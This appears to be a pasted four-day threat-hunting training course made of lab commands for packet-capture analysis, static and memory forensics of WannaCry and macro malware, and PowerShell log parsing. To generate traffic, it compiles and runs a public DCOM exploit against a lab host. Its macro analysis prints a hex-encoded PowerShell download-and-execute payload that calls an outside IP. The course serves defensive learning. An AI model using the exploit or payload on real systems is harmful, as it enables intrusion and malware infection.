· 7 years ago · Feb 10, 2019, 07:24 AM
1 #####################################
2----------- ############### # Day 1: Threat Hunting on the wire ################ -----------
3 #####################################
4
5
6###################################
7# Setting up your virtual machine #
8# Note: run as root user #
9###################################
10
11
12Here is where we will setup all of the required dependencies for the tools we plan to install
13---------------------------Type this as root--------------------------
14apt update
15apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq
16-----------------------------------------------------------------------
17
18
19
20
21Now we install Suricata
22---------------------------Type this as root-------------------------------
23wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz
24
25tar -zxvf suricata-4.0.5.tar.gz
26
27cd suricata-4.0.5
28
29./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var
30
31make
32
33make install
34
35make install-conf
36
37cd rules
38
39cp *.rules /etc/suricata/rules/
40
41cd /etc/suricata/
42
43wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz
44
45tar -zxvf emerging.rules.tar.gz
46-----------------------------------------------------------------------
47
48
49
50
51
52##################################################################
53# Analyzing a PCAP Prads #
54# Note: run as regular user #
55##################################################################
56
57---------------------------Type this as a regular user----------------------------------
58cd ~/pcap_analysis/prads
59
60wget http://45.63.104.73/suspicious-time.pcap
61
62prads -r suspicious-time.pcap -l prads-asset.log
63
64cat prads-asset.log | less
65
66cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
67
68cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
69
70cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
71-----------------------------------------------------------------------
72
73
74
75
76##################################
77# PCAP Analysis with ChaosReader #
78# Note: run as regular user #
79##################################
80---------------------------Type this as a regular user----------------------------------
81cd ~/pcap_analysis/chaos_reader/
82
83wget http://45.63.104.73/suspicious-time.pcap
84
85wget http://45.63.104.73/chaosreader.pl
86
87perl chaosreader.pl suspicious-time.pcap
88
89cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
90
91cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
92
93
94for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
95
96
97------------------------------------------------------------------------
98
99
100
101
102
103
104
105
106#############################
107# PCAP Analysis with tshark #
108# Note: run as regular user #
109#############################
110---------------------------Type this as a regular user---------------------------------
111cd ~/pcap_analysis/tshark
112
113wget http://45.63.104.73/suspicious-time.pcap
114
115tshark -i ens3 -r suspicious-time.pcap -qz io,phs
116
117tshark -r suspicious-time.pcap -qz ip_hosts,tree
118
119tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
120
121tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
122
123
124tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
125
126whois rapidshare.com.eyu32.ru
127
128whois sploitme.com.cn
129
130tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
131
132tshark -r suspicious-time.pcap -qz http_req,tree
133
134tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
135
136tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
137------------------------------------------------------------------------
138
139
140
141#############################
142# Understanding Snort rules #
143#############################
144Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
145
146Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
147
148Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
149
150Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
151
152Field 5: Traffic Direction (->)
153
154Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
155
156Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
157
158Field 8: MSG - what is actually displayed on the analysts machine
159
160
161Let's look at 2 simple rules
162----------------------------------------------------------------------------------
163alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:â€NETBIOS DCERPC ISystemActivator \
164bind attemptâ€; flow:to_server,established; content:â€|05|â€; distance:0; within:1; \
165content:â€|0b|â€; distance:1; within:1; byte_test:1,&,1,0,relative; content:â€|A0 01 00 \
16600 00 00 00 00 C0 00 00 00 00 00 00 46|â€; distance:29; within:16; \
167reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
168
169alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:â€NETBIOS SMB DCERPC ISystemActivator bind \
170attemptâ€; flow:to_server,established; content:â€|FF|SMB|25|â€; nocase; offset:4; \
171depth:5; content:â€|26 00|â€; distance:56; within:2; content:â€|5c \
17200|P|00|I|00|P|00|E|00 5c 00|â€; nocase; distance:5; within:12; content:â€|05|â€; \
173distance:0; within:1; content:â€|0b|â€; distance:1; within:1; \
174byte_test:1,&,1,0,relative; content:â€|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
17546|â€; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
176sid:2193; rev:1;)
177----------------------------------------------------------------------------------
178
179
180
181From your Linux machine ping your Windows machine
182---------------------------Type This-----------------------------------
183ping 192.168.150.1
184-----------------------------------------------------------------------
185
186
187Start wireshark and let's create some simple filters:
188
189Filter 1:
190ip.addr==192.168.150.1
191-----------------------------------------------------------------------
192
193Filter 2:
194ip.addr==192.168.150.1 && icmp
195-----------------------------------------------------------------------
196
197
198Filter 3:
199ip.addr==192.168.150.1 && !(tcp.port==22)
200-----------------------------------------------------------------------
201Now stop your capture and restart it (make sure you keep the filter)
202
203
204
205
206Back to your Linux machine:
207[ CTRL-C ] - to stop your ping
208
209wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
210
211
212gcc -o exploit oc192-dcom.c
213
214./exploit
215
216
217./exploit -d 192.168.150.1 -t 0
218-----------------------------------------------------------------------
219
220
221
222Now go back to WireShark and stop the capture.
223
224
225
226
227
228###############################
229# PCAP Analysis with Suricata #
230# Note: run as root #
231###############################
232--------------------------Type this as root--------------------------------
233cd /home/joe/pcap_analysis/
234
235mkdir suricata
236
237cd suricata/
238
239wget http://45.63.104.73/suspicious-time.pcap
240
241mkdir suri
242
243suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
244
245cd suri/
246
247cat stats.log | less
248
249cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
250
251cat xx01
252
253cat xx02
254
255cat xx03
256
257cat xx04
258
259cat xx05
260
261cat xx06
262------------------------------------------------------------------------
263
264
265#############################
266# PCAP Analysis with Yara #
267# Note: run as regular user #
268#############################
269-------------------------Type this as a regular user----------------------------------
270cd ~/pcap_analysis/
271
272git clone https://github.com/kevthehermit/YaraPcap.git
273cd YaraPcap/
274wget http://45.63.104.73/suspicious-time.pcap
275wget https://github.com/Yara-Rules/rules/archive/master.zip
276unzip master.zip
277cd rules-master/
278ls
279cat index.yar
280clear
281./index_gen.sh
282cd ..
283mkdir matching_files/
284python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
285whereis tcpflow
286vi yaraPcap.py **** fix line 35 with correct path to tcpflow ****:q!
287python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
288cd matching_files/
289ls
290cat report.txt
291------------------------------------------------------------------------
292
293
294
295 ###############################################
296----------- ############### # Day 2: Threat Hunting with Static Analysis ################ -----------
297 ###############################################
298
299
300
301
302###################################
303# Setting up your virtual machine #
304###################################
305
306Here is where we will setup all of the required dependencies for the tools we plan to install
307---------------------------Type This-----------------------------------
308sudo apt update
309sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server build-dep python-mysqldb python-mysqldb
310
311
312sudo pip install -U olefile
313
314
315git clone https://github.com/Te-k/pe.git
316cd pe
317sudo python3 setup.py install
318pip3 install .
319cd ..
320wget http://45.63.104.73/wannacry.zip
321 infected
322-----------------------------------------------------------------------
323
324
325
326
327################
328# The Scenario #
329################
330You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
331
332
333The fastest thing you can do is perform static analysis.
334
335
336
337###################
338# Static Analysis #
339###################
340
341- After logging please open a terminal window and type the following commands:
342
343
344---------------------------Type This-----------------------------------
345cd ~
346
347mkdir static_analysis
348
349cd static_analysis
350
351wget http://45.63.104.73/wannacry.zip
352
353unzip wannacry.zip
354 infected
355
356file wannacry.exe
357
358mv wannacry.exe malware.pdf
359
360file malware.pdf
361
362mv malware.pdf wannacry.exe
363
364hexdump -n 2 -C wannacry.exe
365
366----------------------------------------------------------------------
367
368
369***What is '4d 5a' or 'MZ'***
370Reference:
371http://www.garykessler.net/library/file_sigs.html
372
373
374
375
376---------------------------Type This-----------------------------------
377objdump -x wannacry.exe
378
379strings wannacry.exe
380
381strings wannacry.exe | grep -i dll
382
383strings wannacry.exe | grep -i library
384
385strings wannacry.exe | grep -i reg
386
387strings wannacry.exe | grep -i key
388
389strings wannacry.exe | grep -i rsa
390
391strings wannacry.exe | grep -i open
392
393strings wannacry.exe | grep -i get
394
395strings wannacry.exe | grep -i mutex
396
397strings wannacry.exe | grep -i irc
398
399strings wannacry.exe | grep -i join
400
401strings wannacry.exe | grep -i admin
402
403strings wannacry.exe | grep -i list
404----------------------------------------------------------------------
405
406
407
408
409
410---------------------------Type This-----------------------------------
411pe info wannacry.exe
412pe check wannacry.exe
413pe dump --section text wannacry.exe
414pe dump --section data wannacry.exe
415pe dump --section rsrc wannacry.exe
416pe dump --section reloc wannacry.exe
417strings rdata | less
418strings rsrc | less
419strings text | less
420----------------------------------------------------------------------
421
422
423
424
425
426
427
428
429Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
430
431Quick Google search for "wannacry ransomeware analysis"
432
433
434Reference
435https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
436
437- Yara Rule -
438
439
440Strings:
441$s1 = “Ooops, your files have been encrypted!†wide ascii nocase
442$s2 = “Wanna Decryptor†wide ascii nocase
443$s3 = “.wcry†wide ascii nocase
444$s4 = “WANNACRY†wide ascii nocase
445$s5 = “WANACRY!†wide ascii nocase
446$s7 = “icacls . /grant Everyone:F /T /C /Q†wide ascii nocase
447
448
449
450
451
452
453
454
455Ok, let's look for the individual strings
456
457
458---------------------------Type This-----------------------------------
459strings wannacry.exe | grep -i ooops
460
461strings wannacry.exe | grep -i wanna
462
463strings wannacry.exe | grep -i wcry
464
465strings wannacry.exe | grep -i wannacry
466
467strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
468----------------------------------------------------------------------
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485####################################
486# Tired of GREP - let's try Python #
487####################################
488Decided to make my own script for this kind of stuff in the future. I
489
490Reference1:
491https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
492
493This is a really good script for the basics of static analysis
494
495Reference:
496https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
497
498
499This is really good for showing some good signatures to add to the Python script
500
501
502Here is my own script using the signatures (started this yesterday, but still needs work):
503https://pastebin.com/guxzCBmP
504
505
506
507---------------------------Type This-----------------------------------
508wget https://pastebin.com/raw/guxzCBmP
509
510
511mv guxzCBmP am.py
512
513
514vi am.py
515
516python2.7 am.py wannacry.exe
517----------------------------------------------------------------------
518
519
520
521##############
522# Yara Ninja #
523##############
524
525Reference:
526https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
527
528----------------------------------------------------------------------------
529rule wannacry_1 : ransom
530{
531 meta:
532 author = "Joshua Cannell"
533 description = "WannaCry Ransomware strings"
534 weight = 100
535 date = "2017-05-12"
536
537 strings:
538 $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
539 $s2 = "Wanna Decryptor" wide ascii nocase
540 $s3 = ".wcry" wide ascii nocase
541 $s4 = "WANNACRY" wide ascii nocase
542 $s5 = "WANACRY!" wide ascii nocase
543 $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
544
545 condition:
546 any of them
547}
548
549----------------------------------------------------------------------------
550rule wannacry_2{
551 meta:
552 author = "Harold Ogden"
553 description = "WannaCry Ransomware Strings"
554 date = "2017-05-12"
555 weight = 100
556
557 strings:
558 $string1 = "msg/m_bulgarian.wnry"
559 $string2 = "msg/m_chinese (simplified).wnry"
560 $string3 = "msg/m_chinese (traditional).wnry"
561 $string4 = "msg/m_croatian.wnry"
562 $string5 = "msg/m_czech.wnry"
563 $string6 = "msg/m_danish.wnry"
564 $string7 = "msg/m_dutch.wnry"
565 $string8 = "msg/m_english.wnry"
566 $string9 = "msg/m_filipino.wnry"
567 $string10 = "msg/m_finnish.wnry"
568 $string11 = "msg/m_french.wnry"
569 $string12 = "msg/m_german.wnry"
570 $string13 = "msg/m_greek.wnry"
571 $string14 = "msg/m_indonesian.wnry"
572 $string15 = "msg/m_italian.wnry"
573 $string16 = "msg/m_japanese.wnry"
574 $string17 = "msg/m_korean.wnry"
575 $string18 = "msg/m_latvian.wnry"
576 $string19 = "msg/m_norwegian.wnry"
577 $string20 = "msg/m_polish.wnry"
578 $string21 = "msg/m_portuguese.wnry"
579 $string22 = "msg/m_romanian.wnry"
580 $string23 = "msg/m_russian.wnry"
581 $string24 = "msg/m_slovak.wnry"
582 $string25 = "msg/m_spanish.wnry"
583 $string26 = "msg/m_swedish.wnry"
584 $string27 = "msg/m_turkish.wnry"
585 $string28 = "msg/m_vietnamese.wnry"
586
587
588 condition:
589 any of ($string*)
590}
591----------------------------------------------------------------------------
592
593
594
595
596
597
598
599#####################################################
600# Analyzing Macro Embedded Malware #
601#####################################################
602---------------------------Type This-----------------------------------
603mkdir ~/oledump
604
605cd ~/oledump
606
607wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
608
609unzip oledump_V0_0_22.zip
610
611wget http://45.63.104.73/064016.zip
612
613unzip 064016.zip
614 infected
615
616python oledump.py 064016.doc
617
618python oledump.py 064016.doc -s A4 -v
619 -----------------------------------------------------------------------
620
621
622
623- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
624- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
625
626---------------------------Type This-----------------------------------
627python oledump.py 064016.doc -s A5 -v
628-----------------------------------------------------------------------
629
630- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
631
632---------------------------Type This-----------------------------------
633python oledump.py 064016.doc -s A3 -v
634
635- Look for "GVhkjbjv" and you should see:
636
637636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
638
639- Take that long blob that starts with 636D and finishes with 653B and paste it in:
640http://www.rapidtables.com/convert/number/hex-to-ascii.htm
641-----------------------------------------------------------------------
642
643
644
645###############################
646# Creating a Malware Database #
647###############################
648Creating a malware database (mysql)
649-----------------------------------
650- Step 1: Logging in
651Run the following command in the terminal:
652---------------------------Type This-----------------------------------
653mysql -u root -p (set a password of 'malware')
654
655- Then create one database by running following command:
656
657create database malware;
658
659exit;
660
661wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
662
663vi mal_to_db.py (fill in database connection information)
664
665python mal_to_db.py -i
666
667------- check it to see if the files table was created ------
668
669mysql -u root -p
670 malware
671
672show databases;
673
674use malware;
675
676show tables;
677
678describe files;
679
680exit;
681
682---------------------------------
683
684
685- Now add the malicious file to the DB
686---------------------------Type This-----------------------------------
687python mal_to_db.py -f wannacry.exe -u
688
689
690
691- Now check to see if it is in the DB
692---------------------------Type This-----------------------------------
693mysql -u root -p
694 malware
695
696mysql> use malware;
697
698select id,md5,sha1,sha256,time FROM files;
699
700mysql> quit;
701-----------------------------------------------------------------------
702
703
704
705
706 ###############################################
707----------- ############### # Day 3: Threat hunting with memory analysis ################ -----------
708 ###############################################
709
710
711
712
713
714###################################
715# Setting up your virtual machine #
716###################################
717
718Here is where we will setup all of the required dependencies for the tools we plan to install
719---------------------------Type This-----------------------------------
720apt update
721apt-get install -y foremost tcpxtract python-openpyxl python-ujson python-ujson-dbg python-pycryptopp python-pycryptopp-dbg libdistorm3-3 libdistorm3-dev python-distorm3 volatility volatility-tools
722-----------------------------------------------------------------------
723
724
725
726
727################
728# The Scenario #
729################
730
731
732###################
733# Memory Analysis #
734###################
735---------------------------Type This-----------------------------------
736cd ~/
737
738mkdir mem_analysis
739
740cd mem_analysis
741
742wget http://45.63.104.73/hn_forensics.vmem
743
744volatility pslist -f hn_forensics.vmem
745volatility pslist -f hn_forensics.vmem | awk '{print $2,$3,$4}'
746volatility pslist -f hn_forensics.vmem | awk '{print $2,"\t\t"$3"\t\t","\t\t"$4}'
747volatility connscan -f hn_forensics.vmem
748volatility connscan -f hn_forensics.vmem | grep -E '888|1752'
749
750mkdir malfind/
751mkdir dump/
752mkdir -p output/pdf/
753
754volatility privs -f hn_forensics.vmem
755volatility svcscan -f hn_forensics.vmem
756volatility malfind -f hn_forensics.vmem --dump-dir malfind/
757
758
759volatility -f hn_forensics.vmem memdump -p 888 --dump-dir dump/
760volatility -f hn_forensics.vmem memdump -p 1752 --dump-dir dump/
761
762 ***Takes a few min***
763
764cd dump/
765strings 1752.dmp | grep "^http://" | sort | uniq
766strings 1752.dmp | grep "Ahttps://" | uniq -u
767
768foremost -i 1752.dmp -t pdf -o ../output/pdf/
769cd ../output/pdf/
770cat audit.txt
771cd pdf
772ls
773grep -i javascript *.pdf
774
775
776wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
777unzip pdf-parser_V0_6_4.zip
778python pdf-parser.py -s javascript --raw 00601560.pdf
779python pdf-parser.py --object 11 00601560.pdf
780python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
781
782cat malicious.js
783 -----------------------------------------------------------------------
784
785
786
787 ############################################
788----------- ############### # Day 4: Threat Hunting with log analysis ################ -----------
789 ############################################
790
791#####################
792# Powershell Basics #
793#####################
794
795PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
796
797PowerShell file extension end in .ps1 .
798
799An important note is that you cannot double click on a PowerShell script to execute it.
800
801To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
802
803------------------------Type This------------------------------
804cd c:\
805dir
806cd
807ls
808---------------------------------------------------------------
809
810
811To obtain a list of cmdlets, use the Get-Command cmdlet
812------------------------Type This------------------------------
813Get-Command
814---------------------------------------------------------------
815
816
817You can use the Get-Alias cmdlet to see a full list of aliased commands.
818------------------------Type This------------------------------
819Get-Alias
820---------------------------------------------------------------
821
822
823Don't worry you won't blow up your machine with Powershell
824------------------------Type This------------------------------
825Get-Process | stop-process Don't press [ ENTER ] What will this command do?
826Get-Process | stop-process -whatif
827---------------------------------------------------------------
828
829To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
830------------------------Type This------------------------------
831Get-Help Get-Command
832
833Get-Help Get-Service –online
834
835Get-Service -Name TermService, Spooler
836
837Get-Service –N BITS
838---------------------------------------------------------------
839
840
841
842
843
844- Run cmdlet through a pie and refer to its properties as $_
845------------------------Type This------------------------------
846Get-Service | where-object { $_.Status -eq "Running"}
847---------------------------------------------------------------
848
849
850
851- PowerShell variables begin with the $ symbol. First lets create a variable
852------------------------Type This------------------------------
853$serv = Get-Service –N Spooler
854---------------------------------------------------------------
855
856To see the value of a variable you can just call it in the terminal.
857------------------------Type This------------------------------
858$serv
859
860$serv.gettype().fullname
861---------------------------------------------------------------
862
863
864Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
865------------------------Type This------------------------------
866$serv | Get-Member
867
868Get-Member -InputObject $serv
869---------------------------------------------------------------
870
871
872
873
874Let's use a method and a property with our object.
875------------------------Type This------------------------------
876$serv.Status
877$serv.Stop()
878$serv.Refresh()
879$serv.Status
880$serv.Start()
881$serv.Refresh()
882$serv.Status
883---------------------------------------------------------------
884
885
886If you want some good command-line shortcuts you can check out the following link:
887https://technet.microsoft.com/en-us/library/ff678293.aspx
888
889#############################
890# Simple Event Log Analysis #
891#############################
892
893Step 1: Dump the event logs
894---------------------------
895The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
896
897To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
898If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
899------------------------Type This------------------------------
900Get-EventLog -LogName application | Export-Clixml Applog.xml
901
902type .\Applog.xml
903
904$logs = "system","application","security"
905---------------------------------------------------------------
906
907
908The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
909------------------------Type This------------------------------
910$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
911---------------------------------------------------------------
912
913
914
915
916Step 2: Import the event log of interest
917----------------------------------------
918To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
919Store the results in a variable.
920Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
921
922The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
923------------------------Type This------------------------------
924$seclog = Import-Clixml security.xml
925
926$seclog | select -Last 5
927---------------------------------------------------------------
928
929Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
930------------------------Type This------------------------------
931Get-EventLog Application -After (Get-Date).AddDays(-1)
932---------------------------------------------------------------
933You can use '-after' and '-before' to filter date ranges
934
935One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
936By default, an ordinary user does not have permission to read the security log.
937
938
939
940
941Step 3: Drill into a specific entry
942-----------------------------------
943To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
944
945------------------------Type This------------------------------
946$seclog | select -first 1 | fl *
947---------------------------------------------------------------
948
949The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
950
951------------------------Type This------------------------------
952($seclog | select -first 1).message
953
954(($seclog | select -first 1).message).gettype()
955---------------------------------------------------------------
956
957
958In the *nix world you often want a count of something (wc -l).
959How often is the SeSecurityPrivilege privilege mentioned in the message property?
960To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
961------------------------Type This------------------------------
962$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
963---------------------------------------------------------------
964If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
965
966------------------------Type This------------------------------
967$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
968---------------------------------------------------------------
969
970Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
971Use the count property to determine the total number of entries in the event log.
972------------------------Type This------------------------------
973$seclog.Count
974---------------------------------------------------------------
975
976
977
978
979
980############################
981# Simple Log File Analysis #
982############################
983
984
985You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
986
987------------------------Type This------------------------------
988mkdir c:\ps
989cd c:\ps
990(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
991(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
992Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
993---------------------------------------------------------------
994
995
996
997The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
998------------------------Type This------------------------------
999Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
1000---------------------------------------------------------------
1001
1002
1003
1004To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
1005------------------------Type This------------------------------
1006Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
1007---------------------------------------------------------------
1008
1009
1010To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
1011------------------------Type This------------------------------
1012Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
1013---------------------------------------------------------------
1014
1015
1016Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
1017------------------------Type This------------------------------
1018Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
1019---------------------------------------------------------------
1020
1021In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
1022This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
1023------------------------Type This------------------------------
1024Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
1025---------------------------------------------------------------
1026
1027
1028
1029##############################################
1030# Parsing Log files using windows PowerShell #
1031##############################################
1032
1033Download the sample IIS log http://pastebin.com/LBn64cyA
1034
1035------------------------Type This------------------------------
1036(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
1037
1038Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
1039---------------------------------------------------------------
1040
1041
1042The above command would give us all the WebDAV requests.
1043
1044To filter this to a particular user name, use the below command:
1045------------------------Type This------------------------------
1046Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
1047---------------------------------------------------------------
1048
1049
1050Some more options that will be more commonly required :
1051
1052For Outlook Web Access : Replace WebDAV with OWA
1053
1054For EAS : Replace WebDAV with Microsoft-server-activesync
1055
1056For ECP : Replace WebDAV with ECP
1057
1058
1059
1060
1061
1062
1063
1064####################################################################
1065# Windows PowerShell: Extracting Strings Using Regular Expressions #
1066####################################################################
1067
1068
1069Regex Characters you might run into:
1070
1071^ Start of string, or start of line in a multiline pattern
1072$ End of string, or start of line in a multiline pattern
1073\b Word boundary
1074\d Digit
1075\ Escape the following character
1076* 0 or more {3} Exactly 3
1077+ 1 or more {3,} 3 or more
1078? 0 or 1 {3,5} 3, 4 or 5
1079
1080
1081
1082To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1083
10841) The input file that will be parsed
1085------------------------Type This------------------------------
1086(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
1087(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
1088(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
1089---------------------------------------------------------------
10902) The regular expression that the input file will be compared against
1091
10923) The output file for where the extracted data will be placed.
1093
1094Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1095Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1096
1097To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1098------------------------Type This------------------------------
1099$input_path = 'c:\ps\emails.txt'
1100$output_file = 'c:\ps\extracted_addresses.txt'
1101$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
1102select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1103---------------------------------------------------------------
1104
1105
1106In this script, we have the following variables:
1107
11081) $input_path to hold the path to the input file we want to parse
1109
11102) $output_file to hold the path to the file we want the results to be stored in
1111
11123) $regex to hold the regular expression pattern to be used when the strings are being matched.
1113
